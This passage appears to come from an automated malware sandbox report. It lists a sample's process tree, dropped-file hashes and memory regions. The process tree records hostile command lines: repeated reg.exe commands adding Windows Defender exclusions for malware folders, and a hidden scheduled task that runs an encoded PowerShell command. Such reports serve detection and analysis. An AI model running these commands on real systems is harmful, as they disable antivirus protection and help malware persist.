          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:64
          - Windows security bypass
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:64
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:32
      [4] C:\Windows\SysWOW64\reg.exe
          command line: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:64
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /CREATE /TN "gFACLCJiz" /SC once /ST 07:17:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Creates scheduled task(s)
    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: schtasks /run /I /tn "gFACLCJiz"

[1] C:\Windows\system32\gpscript.exe
    command line: gpscript.exe /RefreshSystemParam

[1] C:\Windows\system32\gpscript.exe
    command line: gpscript.exe /RefreshSystemParam

[1] C:\Windows\system32\gpscript.exe
    command line: gpscript.exe /RefreshSystemParam
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\7zS31EA.tmp\Install.exe
Filesize: 6.2MB
MD5: 22b547949246318eea6b04ce129ec09f
SHA1: b03c29d7f001ade76d377d154d002a6e77f08a6e
SHA256: 5e041c242cccbf1345057c04746ca5aa681376027dc3a0bbb79851790b8c447a
SHA512: 4cb9905254c44f29d907e038b682d517f02f4faf86e0d09e85e1fabb7570006ef47d8a2ff976bce81d4587c382dd6ff12545a9d6252fcd5797d3513114a041ad

C:\Users\Admin\AppData\Local\Temp\7zS40B9.tmp\Install.exe
Filesize: 6.8MB
MD5: 6f52a47480dae7c97a64dd5aebb8e426
SHA1: 204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256: a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512: 994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\SEcCofr.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\SEcCofr.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD537972e87bf168abe828028524a67ea92
SHA1d72a114210bc36a9938c4b10c1a0e81051fd9435
SHA256b7517624d540d4da2b4f2103bdc00277710f1028efb4b67b14150fe10a0d180f
SHA51212ee8e239b069e60d99ec99cb3d9efd458444fd563ecf4066973cf22b96629c098b918140ac1e95464d3803295b21577372955722b061bfdb7b62b7ef5d04bba
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5b120facc8dd52f5d4bafbb7c37687762
SHA1b83c263f2191508eea48f1f14ac731c3121cd2cf
SHA2562df04677d32a0f1c09cc799cc538655a070a236ff2e83a69c6b9c7a01bfdf791
SHA512358c16887ca1c386e5f4ad0cc1484562bc1b36a4b8f31ccfcd9237dad08f566b0f98af05c3cf28ecbbc486b25f0dd46513d773aca336fe03968c65721e8850cb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD55c8b1d7ce66b32798b3c644b00d7218b
SHA151aa046cdca233b1af25d15bbfa8ca6109886df8
SHA256b40a490c4ab1c9b530f11113bda79ad51648d45b50c8cc2f9ed3d4c22a598f79
SHA51295492b60803f17bfc965161b69421b4ae0bb2b7fa383d9f80e391146c3b03c7f718c2e38d65571efd9ca87b7c8998a3bf5d1c06c12b320acd4eea1e191b83055
-
C:\Windows\Temp\fwhiGQHhSfnZUzkc\gcWfOjIO\csoTFpsieIBdIzYY.wsfFilesize
8KB
MD5b64c7e0979518e5396b3f76eda858f71
SHA1ccc232c9737ccdacecd440ec13e243499d7d7974
SHA256aea03e30396443537acfe685e689fd1ca91aedf46bc5f1b2ecabaa79b1af7d40
SHA512cc707e35d96dd8d80177d6a37c9828bf894c20366e2302af4778a4d96a26e3f755bc5bf7c3c76262465c4477417976cf8fed4929e8268d6eb28ddaab57632888
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
\Users\Admin\AppData\Local\Temp\7zS31EA.tmp\Install.exeFilesize
6.2MB
MD522b547949246318eea6b04ce129ec09f
SHA1b03c29d7f001ade76d377d154d002a6e77f08a6e
SHA2565e041c242cccbf1345057c04746ca5aa681376027dc3a0bbb79851790b8c447a
SHA5124cb9905254c44f29d907e038b682d517f02f4faf86e0d09e85e1fabb7570006ef47d8a2ff976bce81d4587c382dd6ff12545a9d6252fcd5797d3513114a041ad
-
\Users\Admin\AppData\Local\Temp\7zS31EA.tmp\Install.exeFilesize
6.2MB
MD522b547949246318eea6b04ce129ec09f
SHA1b03c29d7f001ade76d377d154d002a6e77f08a6e
SHA2565e041c242cccbf1345057c04746ca5aa681376027dc3a0bbb79851790b8c447a
SHA5124cb9905254c44f29d907e038b682d517f02f4faf86e0d09e85e1fabb7570006ef47d8a2ff976bce81d4587c382dd6ff12545a9d6252fcd5797d3513114a041ad
-
\Users\Admin\AppData\Local\Temp\7zS31EA.tmp\Install.exeFilesize
6.2MB
MD522b547949246318eea6b04ce129ec09f
SHA1b03c29d7f001ade76d377d154d002a6e77f08a6e
SHA2565e041c242cccbf1345057c04746ca5aa681376027dc3a0bbb79851790b8c447a
SHA5124cb9905254c44f29d907e038b682d517f02f4faf86e0d09e85e1fabb7570006ef47d8a2ff976bce81d4587c382dd6ff12545a9d6252fcd5797d3513114a041ad
-
\Users\Admin\AppData\Local\Temp\7zS31EA.tmp\Install.exeFilesize
6.2MB
MD522b547949246318eea6b04ce129ec09f
SHA1b03c29d7f001ade76d377d154d002a6e77f08a6e
SHA2565e041c242cccbf1345057c04746ca5aa681376027dc3a0bbb79851790b8c447a
SHA5124cb9905254c44f29d907e038b682d517f02f4faf86e0d09e85e1fabb7570006ef47d8a2ff976bce81d4587c382dd6ff12545a9d6252fcd5797d3513114a041ad
-
\Users\Admin\AppData\Local\Temp\7zS40B9.tmp\Install.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
\Users\Admin\AppData\Local\Temp\7zS40B9.tmp\Install.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
\Users\Admin\AppData\Local\Temp\7zS40B9.tmp\Install.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
\Users\Admin\AppData\Local\Temp\7zS40B9.tmp\Install.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
memory/316-130-0x0000000000000000-mapping.dmp
-
memory/432-144-0x0000000000000000-mapping.dmp
-
memory/528-156-0x0000000000000000-mapping.dmp
-
memory/572-74-0x0000000000000000-mapping.dmp
-
memory/572-162-0x0000000000000000-mapping.dmp
-
memory/608-159-0x0000000000000000-mapping.dmp
-
memory/616-142-0x0000000000000000-mapping.dmp
-
memory/652-92-0x0000000000000000-mapping.dmp
-
memory/792-171-0x0000000000000000-mapping.dmp
-
memory/816-123-0x00000000022A4000-0x00000000022A7000-memory.dmpFilesize
12KB
-
memory/816-121-0x00000000022A4000-0x00000000022A7000-memory.dmpFilesize
12KB
-
memory/816-120-0x000007FEF2F90000-0x000007FEF3AED000-memory.dmpFilesize
11.4MB
-
memory/816-119-0x000007FEF3AF0000-0x000007FEF4513000-memory.dmpFilesize
10.1MB
-
memory/816-166-0x0000000000000000-mapping.dmp
-
memory/816-124-0x00000000022AB000-0x00000000022CA000-memory.dmpFilesize
124KB
-
memory/816-116-0x0000000000000000-mapping.dmp
-
memory/876-172-0x0000000000000000-mapping.dmp
-
memory/900-139-0x0000000000000000-mapping.dmp
-
memory/908-107-0x0000000000000000-mapping.dmp
-
memory/920-87-0x0000000000000000-mapping.dmp
-
memory/928-99-0x0000000000000000-mapping.dmp
-
memory/928-150-0x0000000000000000-mapping.dmp
-
memory/928-168-0x0000000000000000-mapping.dmp
-
memory/1004-146-0x0000000000000000-mapping.dmp
-
memory/1036-160-0x0000000000000000-mapping.dmp
-
memory/1052-149-0x0000000000000000-mapping.dmp
-
memory/1092-115-0x0000000000000000-mapping.dmp
-
memory/1128-165-0x0000000000000000-mapping.dmp
-
memory/1132-54-0x0000000075561000-0x0000000075563000-memory.dmpFilesize
8KB
-
memory/1164-122-0x0000000000000000-mapping.dmp
-
memory/1172-173-0x0000000000000000-mapping.dmp
-
memory/1280-148-0x0000000000000000-mapping.dmp
-
memory/1280-167-0x0000000000000000-mapping.dmp
-
memory/1284-126-0x0000000000000000-mapping.dmp
-
memory/1328-75-0x0000000000000000-mapping.dmp
-
memory/1336-86-0x0000000000000000-mapping.dmp
-
memory/1336-114-0x0000000000000000-mapping.dmp
-
memory/1344-151-0x0000000000000000-mapping.dmp
-
memory/1356-158-0x0000000000000000-mapping.dmp
-
memory/1364-143-0x0000000000000000-mapping.dmp
-
memory/1388-147-0x0000000000000000-mapping.dmp
-
memory/1452-104-0x0000000000000000-mapping.dmp
-
memory/1464-157-0x0000000000000000-mapping.dmp
-
memory/1464-131-0x0000000000000000-mapping.dmp
-
memory/1492-129-0x0000000000000000-mapping.dmp
-
memory/1516-125-0x0000000000000000-mapping.dmp
-
memory/1528-73-0x0000000010000000-0x0000000010B5F000-memory.dmpFilesize
11.4MB
-
memory/1528-64-0x0000000000000000-mapping.dmp
-
memory/1548-56-0x0000000000000000-mapping.dmp
-
memory/1592-141-0x000000000257B000-0x000000000259A000-memory.dmpFilesize
124KB
-
memory/1592-140-0x0000000002574000-0x0000000002577000-memory.dmpFilesize
12KB
-
memory/1592-138-0x000000001B740000-0x000000001BA3F000-memory.dmpFilesize
3.0MB
-
memory/1592-137-0x0000000002574000-0x0000000002577000-memory.dmpFilesize
12KB
-
memory/1592-136-0x000007FEF3870000-0x000007FEF43CD000-memory.dmpFilesize
11.4MB
-
memory/1592-135-0x000007FEF4490000-0x000007FEF4EB3000-memory.dmpFilesize
10.1MB
-
memory/1592-132-0x0000000000000000-mapping.dmp
-
memory/1600-170-0x0000000000000000-mapping.dmp
-
memory/1608-128-0x0000000000000000-mapping.dmp
-
memory/1608-155-0x0000000000000000-mapping.dmp
-
memory/1624-182-0x0000000002424000-0x0000000002427000-memory.dmpFilesize
12KB
-
memory/1624-183-0x000000000242B000-0x000000000244A000-memory.dmpFilesize
124KB
-
memory/1624-181-0x000007FEF2F90000-0x000007FEF3AED000-memory.dmpFilesize
11.4MB
-
memory/1624-180-0x000007FEF3AF0000-0x000007FEF4513000-memory.dmpFilesize
10.1MB
-
memory/1636-169-0x0000000000000000-mapping.dmp
-
memory/1644-127-0x0000000000000000-mapping.dmp
-
memory/1644-152-0x0000000000000000-mapping.dmp
-
memory/1648-161-0x0000000000000000-mapping.dmp
-
memory/1652-175-0x0000000000000000-mapping.dmp
-
memory/1688-90-0x0000000000000000-mapping.dmp
-
memory/1700-177-0x0000000000000000-mapping.dmp
-
memory/1708-78-0x0000000000000000-mapping.dmp
-
memory/1724-145-0x0000000000000000-mapping.dmp
-
memory/1728-164-0x0000000000000000-mapping.dmp
-
memory/1816-82-0x0000000000000000-mapping.dmp
-
memory/1880-176-0x0000000000000000-mapping.dmp
-
memory/1880-79-0x0000000000000000-mapping.dmp
-
memory/1900-102-0x0000000000000000-mapping.dmp
-
memory/1908-98-0x00000000024B4000-0x00000000024B7000-memory.dmpFilesize
12KB
-
memory/1908-94-0x0000000000000000-mapping.dmp
-
memory/1908-95-0x000007FEFB8D1000-0x000007FEFB8D3000-memory.dmpFilesize
8KB
-
memory/1908-96-0x000007FEF4490000-0x000007FEF4EB3000-memory.dmpFilesize
10.1MB
-
memory/1908-101-0x00000000024BB000-0x00000000024DA000-memory.dmpFilesize
124KB
-
memory/1908-100-0x00000000024B4000-0x00000000024B7000-memory.dmpFilesize
12KB
-
memory/1908-97-0x000007FEF3930000-0x000007FEF448D000-memory.dmpFilesize
11.4MB
-
memory/1964-174-0x0000000000000000-mapping.dmp
-
memory/1988-83-0x0000000000000000-mapping.dmp
-
memory/1988-163-0x0000000000000000-mapping.dmp